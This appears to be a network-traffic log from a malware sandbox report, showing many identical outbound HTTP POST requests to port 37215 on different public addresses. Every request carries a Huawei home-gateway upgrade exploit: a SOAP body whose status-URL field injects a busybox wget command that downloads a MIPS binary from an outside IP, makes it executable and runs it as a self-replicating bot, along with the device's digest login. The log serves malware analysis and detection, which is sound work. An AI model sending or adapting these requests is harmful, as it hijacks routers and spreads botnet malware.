                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1024192.168.2.2345206197.171.76.16537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.285969019 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1025192.168.2.2334180157.245.67.21637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.285976887 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1026192.168.2.2348888213.254.213.19937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.285990953 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1027192.168.2.2338148197.140.66.22137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.286004066 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1028192.168.2.235412041.4.226.1537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.287317991 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1029192.168.2.2333642197.46.229.12037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.287352085 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1030192.168.2.2342040157.39.151.4337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.287360907 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1031192.168.2.235011041.35.173.5737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.287547112 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1032192.168.2.235139260.149.195.8737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.287569046 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1033192.168.2.2345476157.190.219.2337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.287570953 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1034192.168.2.235905241.231.23.18737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.287631035 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
